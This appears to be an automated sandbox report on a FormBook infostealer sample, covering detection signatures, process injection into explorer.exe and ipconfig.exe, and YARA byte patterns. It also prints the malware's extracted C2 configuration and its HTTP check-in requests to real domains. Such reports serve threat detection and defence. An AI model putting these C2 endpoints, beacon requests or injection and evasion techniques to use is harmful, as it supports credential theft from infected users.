Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ekeson and sons.exe

Overview

General Information

Sample Name:ekeson and sons.exe
Analysis ID:434779
MD5:3e961220355d19e5e1272fd963f4a3d7
SHA1:f2aa5470d4d9d9bf35946ef8dfdb4c15ac9aa8bf
SHA256:6935472304f1b2e4e19ca521bf82ef1064f62ced4bf0ee3d1b6eac32a3f4b61f
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ekeson and sons.exe (PID: 6908 cmdline: 'C:\Users\user\Desktop\ekeson and sons.exe' MD5: 3E961220355D19E5E1272FD963F4A3D7)
    • ekeson and sons.exe (PID: 6948 cmdline: 'C:\Users\user\Desktop\ekeson and sons.exe' MD5: 3E961220355D19E5E1272FD963F4A3D7)
  • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • ipconfig.exe (PID: 6328 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
      • cmd.exe (PID: 6680 cmdline: /c del 'C:\Users\user\Desktop\ekeson and sons.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ponchomotor.icu/eo5u/"], "decoy": ["nottooshabbyfurniture.com", "replacementmind.com", "monica-beauty.com", "justicehabit.com", "clicypunto.com", "luxurylandlifestyle.com", "luxuryteashop.online", "eternalptc.com", "salthooker.com", "photonbet.com", "instipe.com", "leadfolia.com", "haogu-consulting.com", "activedevon.xyz", "bonijsnv.com", "1worldtraining.com", "skycima.com", "angelkov.com", "zcyr365.com", "ourcloudbox.com", "arctic-thinking.com", "rainmiser.com", "cannabimall.com", "astrobalajichennai.com", "stellarautogroup.com", "bacardite.com", "pikonadiko.info", "barclaymcgain.com", "crimescenesecure.com", "booty1fitness.com", "fitnesstower.net", "kslobon.com", "videosurvillance.com", "voterankedpairs.com", "csmserver.com", "vandeboederij.online", "mirwanonline.com", "tomrings.com", "howdysellshomes.com", "virtualpaycards.com", "areessg.com", "oruiz.services", "bolilao.com", "membersonlyevents.net", "paydayloanr.com", "miedouyao.com", "carrolpuppies.com", "imnukdesignstudios.com", "gds-oman.com", "cultureatlanta.com", "tucomprafracil.com", "atlasholds.com", "fullsend-life.com", "everythingshows.com", "ba-kor.com", "hebeidadao.com", "the13thway.com", "zijintai.net", "ccyvyx.net", "antarcontabilidade.com", "hesovery.cool", "blekcare.com", "jezelf-zijn.info", "masterobi01.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ponchomotor.icu/eo5u/"], "decoy": ["nottooshabbyfurniture.com", "replacementmind.com", "monica-beauty.com", "justicehabit.com", "clicypunto.com", "luxurylandlifestyle.com", "luxuryteashop.online", "eternalptc.com", "salthooker.com", "photonbet.com", "instipe.com", "leadfolia.com", "haogu-consulting.com", "activedevon.xyz", "bonijsnv.com", "1worldtraining.com", "skycima.com", "angelkov.com", "zcyr365.com", "ourcloudbox.com", "arctic-thinking.com", "rainmiser.com", "cannabimall.com", "astrobalajichennai.com", "stellarautogroup.com", "bacardite.com", "pikonadiko.info", "barclaymcgain.com", "crimescenesecure.com", "booty1fitness.com", "fitnesstower.net", "kslobon.com", "videosurvillance.com", "voterankedpairs.com", "csmserver.com", "vandeboederij.online", "mirwanonline.com", "tomrings.com", "howdysellshomes.com", "virtualpaycards.com", "areessg.com", "oruiz.services", "bolilao.com", "membersonlyevents.net", "paydayloanr.com", "miedouyao.com", "carrolpuppies.com", "imnukdesignstudios.com", "gds-oman.com", "cultureatlanta.com", "tucomprafracil.com", "atlasholds.com", "fullsend-life.com", "everythingshows.com", "ba-kor.com", "hebeidadao.com", "the13thway.com", "zijintai.net", "ccyvyx.net", "antarcontabilidade.com", "hesovery.cool", "blekcare.com", "jezelf-zijn.info", "masterobi01.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: ekeson and sons.exeVirustotal: Detection: 30%Perma Link
      Source: ekeson and sons.exeReversingLabs: Detection: 51%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: ekeson and sons.exeJoe Sandbox ML: detected
      Source: 10.2.ipconfig.exe.3bb7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 1.2.ekeson and sons.exe.430000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 10.2.ipconfig.exe.d105b0.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: ekeson and sons.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: Binary string: ipconfig.pdb source: ekeson and sons.exe, 00000001.00000002.431438448.0000000002AC0000.00000040.00000001.sdmp
      Source: Binary string: ipconfig.pdbGCTL source: ekeson and sons.exe, 00000001.00000002.431438448.0000000002AC0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.379665278.0000000007CA0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: ekeson and sons.exe, 00000000.00000003.350189687.0000000009A20000.00000004.00000001.sdmp, ekeson and sons.exe, 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ekeson and sons.exe, ipconfig.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.379665278.0000000007CA0000.00000002.00000001.sdmp
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,1_2_00405E61
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0040263E FindFirstFileA,1_2_0040263E
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_0040548B
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 4x nop then pop edi1_2_0043C3EF
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi10_2_02F6C3EF

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49742 -> 75.2.26.18:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49742 -> 75.2.26.18:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49742 -> 75.2.26.18:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 75.2.26.18:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 75.2.26.18:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 75.2.26.18:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 98.124.204.16:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 98.124.204.16:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 98.124.204.16:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.102.136.180:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.ponchomotor.icu/eo5u/
      Performs DNS queries to domains with low reputationShow sources
      Source: C:\Windows\explorer.exeDNS query: www.activedevon.xyz
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=0tmYgKUoP8HBZJPHrN3mEpntgEeg92lG9aPAPT1lmhriAZaUzsP0gPfGme0eRnFww8h1H8FnKQ== HTTP/1.1Host: www.csmserver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?WDH4Z=e/xZClE2gqW11N5mIdfQbGNamif3pkKFLmA6EuyQzIHsEAjXCN6/9/EgTPNIZMvp3EoPPaqfFA==&3flLi=3fixF HTTP/1.1Host: www.virtualpaycards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=gO4K5mHcn2QPYGRvxafNe+5p9r0cfSpdBn55FnpuS2mPyHUUFTjtXKJi1XneNJcm9Y4m6sLWag== HTTP/1.1Host: www.activedevon.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?WDH4Z=yxHfGUFjXEGKKHe496T5QQpeNFyvG4o9Xb/7GVQTfhZwVL2GTV3Bu5rpqIAUlpPtd3oFrC0Mdg==&3flLi=3fixF HTTP/1.1Host: www.fitnesstower.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ== HTTP/1.1Host: www.astrobalajichennai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?WDH4Z=gZFKoILzQUaYoLKingixYHxTjCf2oStQNi0AvXN4/YVm/R1ciwnO5FzTPL9EI6/IQBok7I5ryQ==&3flLi=3fixF HTTP/1.1Host: www.oruiz.servicesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=Ezm+JrLE+5pPue5ylk02zCcbBRDxpUQd/NZmTpADB2YZ+yT8iWaX2PHRJKXZOqAmups63MS7lw== HTTP/1.1Host: www.mirwanonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 98.124.204.16 98.124.204.16
      Source: Joe Sandbox ViewASN Name: ENOMAS1US ENOMAS1US
      Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=0tmYgKUoP8HBZJPHrN3mEpntgEeg92lG9aPAPT1lmhriAZaUzsP0gPfGme0eRnFww8h1H8FnKQ== HTTP/1.1Host: www.csmserver.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?WDH4Z=e/xZClE2gqW11N5mIdfQbGNamif3pkKFLmA6EuyQzIHsEAjXCN6/9/EgTPNIZMvp3EoPPaqfFA==&3flLi=3fixF HTTP/1.1Host: www.virtualpaycards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=gO4K5mHcn2QPYGRvxafNe+5p9r0cfSpdBn55FnpuS2mPyHUUFTjtXKJi1XneNJcm9Y4m6sLWag== HTTP/1.1Host: www.activedevon.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?WDH4Z=yxHfGUFjXEGKKHe496T5QQpeNFyvG4o9Xb/7GVQTfhZwVL2GTV3Bu5rpqIAUlpPtd3oFrC0Mdg==&3flLi=3fixF HTTP/1.1Host: www.fitnesstower.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ== HTTP/1.1Host: www.astrobalajichennai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?WDH4Z=gZFKoILzQUaYoLKingixYHxTjCf2oStQNi0AvXN4/YVm/R1ciwnO5FzTPL9EI6/IQBok7I5ryQ==&3flLi=3fixF HTTP/1.1Host: www.oruiz.servicesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /eo5u/?3flLi=3fixF&WDH4Z=Ezm+JrLE+5pPue5ylk02zCcbBRDxpUQd/NZmTpADB2YZ+yT8iWaX2PHRJKXZOqAmups63MS7lw== HTTP/1.1Host: www.mirwanonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.csmserver.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 15 Jun 2021 12:02:43 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: ekeson and sons.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: ekeson and sons.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000000.389978846.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000003.00000000.383081144.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: ipconfig.exe, 0000000A.00000002.598804468.0000000003D32000.00000004.00000001.sdmpString found in binary or memory: https://www.mirwanonline.com/eo5u/?3flLi=3fixF&WDH4Z=Ezm
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405042

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
